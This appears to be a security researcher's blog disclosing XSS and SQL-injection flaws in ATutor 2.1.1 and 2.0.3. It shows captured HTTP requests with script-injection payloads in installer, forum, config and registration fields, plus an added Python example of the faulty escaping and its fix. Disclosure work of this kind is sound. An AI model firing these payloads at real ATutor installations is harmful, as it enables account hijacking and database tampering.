
Monday, 24 February 2014

[EN] ATutor 2.1.1 XSS

Over the last few days I found a few bugs in the latest versions of two popular web applications. Both
can be found here, but below you have the detailed findings for the latest ATutor (2.1.1).


# ==============================================================
# Title ...| ATutor Multiple vulnerabilities
# Version .| ATutor-2.1.1
# Date ....| 19.02.2014
# Found ...| HauntIT Blog
# Home ....| https://atutor.ca
# ==============================================================


# ==============================================================
# 1. During installation: XSS and SQL injection:

---<request>---
POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 191

action=process&step=2&new_version=2.1.1&db_host=localhost&db_port=3306&db_login=root&db_password=superpass&db_name='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&tb_prefix=AT_&submit=Next+%BB+
---<request>---


---<response>---
<ul><li>Database <b>\'>\"><script>alert(1)</script></b> created successfully.
---<response>---

--> The tb_prefix and new_version parameters are also vulnerable.


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 667

action=process&form_admin_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&form_account_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&step=3&step2%5Bnew_version%5D='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&step2%5Bdb_host%5D=localhost&step2%5Bdb_port%5D=3306&step2%5Bdb_login%5D=root&step2%5Bdb_password%5D=superpass&step2%5Bdb_name%5D=atutor&step2%5Btb_prefix%5D=AT_&smtp=false&admin_username=admin&admin_password=&admin_email=admin%40here.com&site_name=Course+Server&email=admin%40here.com&just_social=0&home_url=&account_username=admin&account_password=&account_email=admin%40here.com&account_fname=admin&account_lname=admin&submit=+Next+%BB

---<request>---

The following parameters are also vulnerable to XSS:
step2%5Bnew_version%5D
step2%5Bdb_host%5D
step2%5Bdb_port%5D
step2%5Bdb_login%5D
step2%5Bdb_password%5D
step2%5Bdb_name%5D
step2%5Btb_prefix%5D


# ==============================================================
# 3. Persistent XSS (from admin)

---<request>---
POST /k/cms/atutor/ATutor/mods/_standard/forums/admin/forum_add.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 108

add_forum=true&title='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&description=aaaaaaaaaaaaaa&edit=0&submit=Save
---<request>---

---<response>---
<span class="required" title="Required Field">*</span><label for="title">Title</label><br />
    <input type="text" name="title" size="40" id="title" value="'>"><body/onload=alert(9999)>" />
  </div>
---<response>---
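The two reflections above (the installer's "Database ... created successfully" line in section 1 and the forum title echoed into value="" in section 3) re-created in plain Python, as an added example that is not ATutor's code. It assumes the installer applied an addslashes()-style escape, which is what the \' and \" in the captured response suggest, and shows why that does not stop HTML injection and what does: an identifier allowlist for the SQL side and quote-aware HTML encoding for the output side. The sample bodies are trimmed copies of the captured requests.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample bodies, trimmed from the two captured requests above.
INSTALL_BODY = ("action=process&step=2&db_name='%3e\"%3e%3cscript%3ealert(1)"
                "%3c%2fscript%3e&tb_prefix=AT_")
FORUM_BODY = "add_forum=true&title='%3e\"%3e%3cbody%2fonload%3dalert(9999)%3e"

# Allowlist for MySQL identifiers (database name, table prefix): identifiers
# cannot be bound as prepared-statement parameters, so they must be validated.
IDENT_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")

def field(body: str, name: str) -> str:
    """Return one decoded form field from a URL-encoded body."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]

def addslashes(s: str) -> str:
    """PHP-style addslashes(): SQL-oriented, leaves < and > untouched."""
    return re.sub(r"(['\"\\])", r"\\\1", s)

def is_valid_identifier(name: str) -> bool:
    return IDENT_RE.match(name) is not None

def vulnerable_install_message(db_name: str) -> str:
    # Mirrors the captured response: backslashes appear, <script> survives.
    return f"<ul><li>Database <b>{addslashes(db_name)}</b> created successfully."

def safe_install_message(db_name: str) -> str:
    # Allowlist covers CREATE DATABASE; html.escape covers the HTML context.
    if not is_valid_identifier(db_name):
        raise ValueError("database name must match [A-Za-z0-9_]{1,64}")
    return f"<ul><li>Database <b>{html.escape(db_name)}</b> created successfully."

def vulnerable_title_input(title: str) -> str:
    # Mirrors forum_add.php: the quote inside the title closes value="".
    return f'<input type="text" name="title" value="{title}" />'

def safe_title_input(title: str) -> str:
    # quote=True also encodes ' and ", so the attribute stays closed.
    return f'<input type="text" name="title" value="{html.escape(title, quote=True)}" />'

if __name__ == "__main__":
    print(vulnerable_install_message(field(INSTALL_BODY, "db_name")))
    print(vulnerable_title_input(field(FORUM_BODY, "title")))
    print(safe_title_input(field(FORUM_BODY, "title")))
```

Running it reproduces the two captured response fragments byte for byte, followed by the encoded attribute that no longer breaks out.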



# ==============================================================
# 4. Edit config (from admin user):

---<request>---
POST /k/cms/atutor/ATutor/admin/config_edit.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 946

site_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&home_url=http%3A%2F%2Fwww.atutorspaces.com&default_language=en&contact_email=admin%40here.com&time_zone=0&session_timeout=20&max_file_size=10485760&max_course_size=104857600&max_course_float=2097152&max_login=5&display_name_format=1&master_list=0&allow_registration=1&allow_browse=1&show_current=1&allow_instructor_registration=1&use_captcha=0&allow_unenroll=1&email_confirmation=0&allow_instructor_requests=1&disable_create=0&email_notification=1&auto_approve_instructors=0&theme_categories=0&user_notes=0&illegal_extentions=exe+asp+php+php3+bat+cgi+pl+com+vbs+reg+pcd+pif+scr+bas+inf+vb+vbe+wsc+wsf+wsh&cache_dir=&cache_life=7200&latex_server=http%3A%2F%2Fwww.atutor.ca%2Fcgi%2Fmimetex.cgi%3F&course_backups=5&sent_msgs_ttl=120&check_version=0&fs_versioning=1&old_enable_mail_queue=0&enable_mail_queue=0&auto_install_languages=0&pretty_url=0&course_dir_name=0&apache_mod_rewrite=0&submit=Save
---<request>---
 
If you have any questions, feel free to ask directly (via mail or comments).
 
Thanks ;) 


Saturday, 22 February 2014

[EN] Two more publications

And here we go again ;)

In the "public" section here you can find two more publications about
two web applications tested over the last few days: ILIAS and ATutor (in the latest version, of course).

If you have any questions, feel free to ask.
I will answer ASAP (as always ;) ).

Cheers
o/

Tuesday, 18 December 2012

[EN] ATutor 2.1 vulnerabilities

Hi,

a few findings in the ATutor CMS.

I must say that the developer team is really fast :)

Good job, thanks!

(The post will be updated as soon as the dev team releases the patch.)

* Update 20.12.2012 *
Today the dev team sent me information about the patch.
The post will be updated as soon as possible.

o/

Thursday, 26 April 2012

[EN] ATutor 2.0.3 XSS


[ TITLE ....... ][ ATutor 2.0.3 XSS
[ DATE ........ ][ 14.04.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://
[ VERSION ..... ][
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is a very nice CMS, you should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?


[--------------------------------------------[
[ 3. Where is bug :)
................
hard copied from burp:
POST /www/NEW/atutor/ATutor/registration.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/www/NEW/atutor/ATutor/registration.php?register=Register
Cookie: ATutorID=ggobghtrr9dlt3d2qrsrjeej86; ea630b8e07331dfe8176df9908b196be=en-GB; PHPSESSID=rcqn6f0825bopcnfuthkb95la1; docebo_installer=qkel6srpbe1r44falthfgbloi7; docebo_session=au1hlm6k0dj1t72lvl88pdqt31; d5ff290df9b8ab6a17548bbbc48d21bc=903fb97e17f9a31fea5f97ee76a591bf
Content-Type: application/x-www-form-urlencoded
Content-Length: 1605
Connection: close

ml="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&password_error="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&form_password_hidden=923956e1de909d796933df77360069ceaa3df747&registration_token=04bfd37055f6b1b81319dbc326165a78af8a2ba0&login="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e%2F**%2For%2F**%2F1%3D%271%27&form_password1="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&form_password2="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&email="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&private_email="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&email2="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&first_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&second_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&last_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&year="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&month="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&day="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&gender="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&address="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&postal="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&city="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&province="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&country="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&phone="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&website="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&submit=+Save+

.........

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[